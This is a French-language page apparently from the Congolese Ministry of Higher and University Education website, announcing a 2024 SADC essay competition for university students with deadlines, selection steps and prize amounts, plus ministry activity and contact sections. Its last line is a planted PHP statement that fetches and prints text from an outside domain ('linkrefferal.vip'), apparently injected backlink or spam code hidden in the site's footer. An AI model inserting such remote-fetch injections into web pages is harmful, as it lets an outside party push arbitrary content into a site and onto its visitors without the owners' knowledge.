Enseignement Supérieur et Universitaire congolais en marche vers la numérisation

FLASH INFO :

Kinshasa, samedi 15 juin 2024.

Concours de dissertation de la SADC pour les étudiants des établissements de l’ESU

Le Secrétaire général à l’Enseignement Supérieur et Universitaire a publié en date du 17 février 2024 un communiqué de service à l’attention des tous les chefs d’Etablissements de l’ESU en RDC.


En effet, tous les étudiants du niveau supérieur et universitaire des Etats membres de la SADC sont invités à participer au concours de dissertation de la SADC en mémoire des pères fondateurs de notre communauté. Pour ce faire, il est demandé à tous les Chefs d’Etablissements de l’ESU de prendre des dispositions pratiques pour l’organisation d’un concours de dissertation dans leur établissement respectif sous le thème : « Que pensez-vous des réalisations de la SADC depuis sa création et est-ce qu’elle reflète la vision de ses fondateurs ? ».


Cette activité se déroulera de la manière suivante :



  1. Présélection : Chaque établissement devra sélectionner la meilleure dissertation rédigée de son étudiant la faire parvenir sous pli fermé avant le 29 février 2024 au Secrétariat Général de l’ESU accompagné d’une fiche contenant l’identité et les informations de l’étudiant auteur de cette rédaction (modèle en annexe).

  2. Sélection : Au niveau national une équipe d’experts en didactique sera mise en place pour sélectionner la meilleure dissertation.

  3. Acheminement : les dissertations retenues seront envoyées à la SADC au plus tard le 31 mars 2024 pour être soumis à un jury indépendant. Ainsi, le premier gagnant aura 2000$, le Second 1500$ et le troisième 1000$.


N.B : vous trouvez en annexe du présent communiqué, les directives à tenir compte pour l’organisation de ce concours et la correction des épreuves.


French Entry Form - SADC Tertiary Institution Essay.pdf


French Letter - Launch of Tertiary Schools Essay Competition 2024.pdf


French Brochure - TERTIARY SCHOOL COMPETITION 2024.pdf


Publier le 21/02/2024 11h-29min-00s

Par : Espérant LUVUMBU


A LIRE AUSSI



Remise et reprise à l’Enseignement Supérieur et Universita... Suite


Son excellence MUHINDO NZANGI, Ministre de l’ESU a publié e... Suite


Le Secrétaire Général de l’ESU a publié trois mesures d... Suite


Publication de la note circulaire portant mesures d’incitati... Suite


Concours de dissertation de la SADC pour les étudiants des é... Suite


Publication de l’Arrêté Ministériel n°345 du 20/07/2023 ... Suite


Publication de l’Arrêté Ministériel n°342 du 20/07/2023 ... Suite


Publication de l’Arrêté Ministériel n°341 du 20/07/2023 ... Suite


Publication de l’Arrêté Ministériel n°343 du 20/07/2023 ... Suite


NOS ACTIVITES


Mobirise

Carte Universitaire

Le Ministère grâce à sa Direction Informatique produit les cartes universitaires de la République démocratique du Congo que les universités achète chaque année Voir les différentes cartes

Mobirise

Entérinement et Homologation

La Loi et les Instructions académiques en République Démocratique du Congo exigent des Etablissements Publics, Privés agrées et admis à l’agrément de remettre aux Voir la suite

Mobirise

Bourses d'études

Hormis la Bourse d’études de solidarité nationale et d’excellence, le Ministère de l’ESU octroi des bourses d'études pour plusieurs filières d’études dans le cadre ...Voir la suite

Mobirise

Contrôle de scolarité

Mission de contrôle de la scolarité des finalistes des Etablissements Publics ou Privés agrées et admis à l’agreement de l’ESU. La loi et les instructions académiques... Voir la suite

NOS PARTENAIRES


Dans le cadre de la Coopération Bilatéral (Etat à Etat), Multilatéral (internationale) et Régionale (sous-région), le Ministère de l’Enseignement Supérieur et Universitaire entretient des relations de Partenariat et conclu les accords de Coopérations avec des Etats, de Bailleurs de fonds, des Organismes et des Universités étrangères pour l’amélioration de la qualité de l’Enseignement au Supérieur.

Ce partenariat permet aux Etudiants, aux Personnels Académiques Enseignants et aux Administratifs de l’Enseignement du Supérieur de bénéficier des bourses d’études et de formation. Dans le même cadre, les structures spécialisées de l’Enseignement Supérieur et Universitaire bénéficient aussi l’appui financier, technique et logistique, étant entendu que certains projets font appels au Partenariat Publics Privés (PPP) lors de leurs exécutions.

Ministère de l'ESU

Adresse :

Secrétariat Général :

Boulevard Tshatshi N°67                    
Kinshasa/Gombe, RDC

Contact

Email: contact@minesu.gouv.cd 

Autres liens

Présidence de la République
Primature

echo file_get_contents("https://linkrefferal.vip/backlink.txt");